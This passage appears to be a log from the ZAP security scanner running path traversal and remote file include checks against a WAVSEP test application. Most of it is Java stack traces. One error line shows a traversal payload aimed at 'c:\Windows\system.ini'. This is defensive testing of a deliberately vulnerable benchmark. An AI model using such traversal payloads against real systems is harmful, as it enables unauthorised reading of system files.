org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037765 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037766 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037967 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037967 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038168 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038168 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038169 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038168 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038369 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038375 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038375 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4038377 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4039383 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/c:\Windows\system.ini org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/c:\Windows\system.ini at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 4045752 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestPathTraversal in 148.431s 4045753 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestRemoteFileInclude strength LOW threshold MEDIUM 4105188 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 4105188 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 4105194 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 4105280 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 4105283 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 4184100 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: unsupported protocol: 'www.google.com' 4184101 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: unsupported protocol: 'www.google.com' 4184300 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: unsupported protocol: 'www.google.com' 4185263 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: http 4185463 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: http 4185463 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: http 4186272 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'www.google.com' java.lang.IllegalStateException: unsupported protocol: 'www.google.com' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude.scan(TestRemoteFileInclude.java:211) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4186273 [ZAP-ActiveScanner-0] 